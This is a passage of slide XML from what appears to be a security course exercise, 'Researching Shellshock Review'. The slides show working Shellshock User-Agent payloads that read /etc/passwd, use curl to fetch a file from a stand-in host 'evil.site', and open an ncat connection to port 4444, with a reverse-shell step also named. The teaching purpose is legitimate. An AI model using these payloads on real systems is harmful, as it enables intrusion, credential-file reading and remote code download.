            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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252"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2253" name="Google Shape;2253;p126"/>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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2254" name="Google Shape;2254;p126"/>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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2255" name="Google Shape;2255;p12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24</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2256" name="Google Shape;2256;p126"/>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257" name="Google Shape;2257;p126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1183050"/>
            <a:ext cx="9144000" cy="3723300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Read /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>/passwd:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/passwd'</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> &amp;&amp; curl -0 http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>evil.site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Open an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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261"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2262" name="Google Shape;2262;p12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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2263" name="Google Shape;2263;p127"/>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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2264" name="Google Shape;2264;p12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25</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2265" name="Google Shape;2265;p127"/>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266" name="Google Shape;2266;p127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1183050"/>
            <a:ext cx="9144000" cy="3723300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cd /tmp &amp;&amp; curl -0 http://evil.site/mal.php'</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open an Ncat connection to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'ncat 192.168.0.5 4444`</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Send a reverse shell to your port 4444:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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270"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2271" name="Google Shape;2271;p128"/>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Researching Shellshock Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2272" name="Google Shape;2272;p128"/>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Write Shellshock payloads that: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2273" name="Google Shape;2273;p12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26</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2274" name="Google Shape;2274;p128"/>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275" name="Google Shape;2275;p128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1183050"/>
            <a:ext cx="9144000" cy="3723300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read /etc/passwd:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use curl to download a malicious file from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.suite/mal.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
